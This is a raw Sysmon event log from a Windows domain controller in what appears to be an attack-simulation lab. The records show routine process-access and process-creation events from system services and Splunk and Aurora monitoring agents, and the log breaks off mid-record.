12:24:32.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E500-63C7-5E06-00000000AF02}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E500-63C7-5E06-00000000AF02}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.379{FE4C2B44-E500-63C7-5E06-00000000AF02}7152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.310{FE4C2B44-DDF7-63C7-B204-00000000AF02}48485092C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\TokenBroker.dll+112ea|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6210c|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e 10341000x800000000000000044545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.310{FE4C2B44-DDF7-63C7-B204-00000000AF02}48485092C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+11213|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6210c|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d 10341000x800000000000000044544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.294{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.294{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.294{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.278{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.247{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.247{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.247{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.247{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.244{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.244{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:32.142{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.983{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000044589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.983{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000044588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.983{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E500-63C7-5D06-00000000AF02}6296C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000044587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E501-63C7-6006-00000000AF02}2412C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:33.865{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E501-63C7-6006-00000000AF02}2412C:\Program 